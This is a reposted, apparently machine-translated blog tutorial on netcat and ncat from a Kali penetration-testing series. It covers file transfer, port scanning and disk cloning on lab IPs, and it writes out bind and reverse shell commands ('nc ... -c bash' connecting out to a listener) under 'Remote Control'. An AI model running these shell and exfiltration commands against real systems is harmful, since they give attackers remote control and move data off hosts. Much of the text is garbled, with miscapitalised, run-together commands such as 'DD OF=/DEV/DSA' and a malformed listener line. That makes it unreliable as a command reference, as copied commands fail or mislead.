What is Netcat?
Netcat is a featured networking utility which reads and writes data across network connections, using the TCP/IP protocol.
It is the designed to be a reliable "back-end" tool which can be used directly or easily driven by other programs and scripts. At the same time, it's a Feature-rich network debugging and Exploration tool, since it can create almost any kind of conn Ection you would need and have several interesting built-in capabilities.
The GNU Netcat--Official homepage
Help information:
Nc-h:connect to SOMEWHERE:NC [-options] hostname port[s] [ports] ... listen for inbound:nc-l-P port [-options] [Hostnam E] [port]options:-c shell Commandsas '-e '; Use/bin/sh to exec [dangerous!!] -e Filenameprogram to exec after connect [dangerous!!] -ballow broadcasts-g gatewaysource-routing Hop Point[s], up to 8-g numsource-routing Pointer:4, 8, ...-hthis cruft-i Secsdelay interval for lines sent, ports scanned- k set keepalive option on Socket-llisten mode, for inbound Conne Cts-nnumeric-only IP addresses, no dns-o filehex dump of traffic-p portlocal Port number-rrandomize local and remote ports -Q Secsquit after EOF on stdin and delay of secs-s addrlocal source address-t tosset Type of Service-tanswer TELNET Negoti ATION-UUDP Mode-vverbose [use twice-be + verbose]-w Secstimeout for connects and final net Reads-csend CRLF as line- ENDING-ZZERO-I/O mode [used for scanning]
A: Server IP 192.168.192.144
B: Client IP 192.168.192.100
1. Normal port connection
NC-NV 192.168.192.144 #连接A服务武器的80端口
Direct communication:
Server A:nc-l-P 333 #开启并监听333端口
Client B:NC-NV 192.168.192.144 333
2. Transferring text messages
Server A:nc-l-P 333
Client B:ls-l | NC-NV 192.168.192.144 333 #显示A的目录信息
Server A:nc-l-P 333 >message.txt
Client B:ps aux | grep SSH | NC-NV 192.168.192.144 333-q 1 #ssh进程信息传输给A
3. Transferring files
Server A:nc-l-P 333 > From_bclient.mp4 #接受文件端
Client B:NC-NV 192.168.192.144 333 < my.mp4-q 1 #发送文件端
-Q 1: Exit after 1 seconds of transmission end
Server A:nc-l-P 333 < A.mp4-q 1 #发送文件端
Client B:NC-NV 192.168.192.144 333 > From_a.mp4 #接收文件端
4. Transfer Directory
a:tar-cvf-notebooks/| NC-LP 192.168.192.144-q 1
B:NC-NV 192.168.192.144 333 | TAR-XVF-
5. Transferring encrypted files
A:NC-LP 333 | MCrypt--flush-fbqd-a rijndael-256-m ECB > Fromb.mp4
B:mcrypt--flush-fbqd-a rijndael-256-m ECB < My.mp4 | NC-NV 192.168.192.144 333-q 1
6. Streaming Media Services
A:cat A.mp4 | NC LP 333 #流媒体服务端
B:NC-NV 192.168.192.144 333 | MPLAYER-VO X11-cache 3000-
MPlayer: command-mode player
7. Port Scan
Nc-nvz 192.168.190.144 1-1024 #扫描A的1-Port 1024th default scan TCP port
Nc-nvzu 192.168.190.144 1-1024 #扫描UDP端口
8. Remote hard disk/memory clone
A:NC LP 333 | DD OF=/DEV/DSA
B:DD IF=/DEV/SDA | NC-NV 192.168.192.144 333-q 1
9. Remote CONTROL
B Control A
A:NC-LP 333-c Bash
B:NC 192.168.192.144 333
Note:
A's firewall is closed all Port B cannot control a through the connection port, B turns on and listens on port 333, let a active to connect
B Control A
A:NC 192.168.192.100 333-c Bash
B:NC-LP 333
NC lacks encryption and authentication, and the information transmitted directly is addressed in plaintext:ncat
usage:ncat [options] [hostname] [port]options taking a time assume seconds. Append ' Ms ' for milliseconds, ' s ' for seconds, ' m ' for minutes, or ' H ' for hours (e.g. 500ms). -4 use IPv4 only-6 with IPv6 only-u,--unixsock use Unix do Main sockets Only-c,--crlf use CRLF for EOL sequence-c,--sh-exec <command> executes the GIV En command via/bin/sh-e,--exec <command> executes the given command--lua-exec <filename> exec Utes the given Lua script-g HOP1[,HOP2,...] Loose Source routing Hop points (8 max)-G <n> Loose Source Routing Hop pointer (4, 8, 12, ...) -M,--max-conns <n> Maximum <n> simultaneous connections-h,--help Display this hel P screen-d,--delay <time> Wait between Read/writes-o,--output <filename> Dump session data to A file-x,--hex-dump <filename>Dump session data as Hex to a file-i,--idle-timeout <time> idle read/write timeout-p,--source-port Port S Pecify source port to Use-s,--source addr Specify Source address to use (doesn ' t affect-l)-L,--listen Bind and listen for incoming connections-k,--keep-open Accept multiple connections in listen mode -N,--nodns do not resolve hostnames via dns-t,--telnet Answer telnet negotiations-u,- -UDP use UDP instead of the default TCP--SCTP use SCTP instead of default tcp-v,--ve Rbose Set verbosity level (can be used several times)-W,--wait <time> Connect timeout-z ZERO-I/O mode, report connection status only--append-output append rather than clobber Specified output files--send-only only send data, ignoring received; Quit on EOF--recv-only only receive data,Never send anything--allow allow only given hosts to connect to Ncat--allowfile A fi Le of hosts allowed to connect to NCAT--deny deny given hosts from connecting to Ncat--denyfil e A file of the hosts denied from connecting to Ncat--broker Enable ncat ' s connection brokerin G Mode--chat Start a simple ncat chat server--proxy <addr[:p ort]> specify address of HO St to proxy through--proxy-type <type> specify proxy type ("http" or "SOCKS4" or "SOCKS5")--proxy-aut H <auth> authenticate with HTTP or SOCKS proxy server--ssl Connect or listen with SSL --ssl-cert Specify SSL certificate file (PEM) for listening--ssl-key specify SSL private K EY (PEM) for listening--ssl-verify Verify trust and domain name of certificates--ssl-trustfile PEM file containing TRUsted SSL Certificates--ssl-ciphers cipherlist containing SSL ciphers to use--SSL-ALPN AL PN protocol list to use. --version Display ncat ' s version information and exit
A:
Ncat-c Bash--allow 192.168.192.100-vnl 333--ssl #允许192.168.192.100 Connect SSL Encryption
B:
NCAT-NV 192.168.192.144 333--ssl
A:
B:
Reprint please indicate the source.
Posted on 2018-04-23
Kali penetration test 1-netcat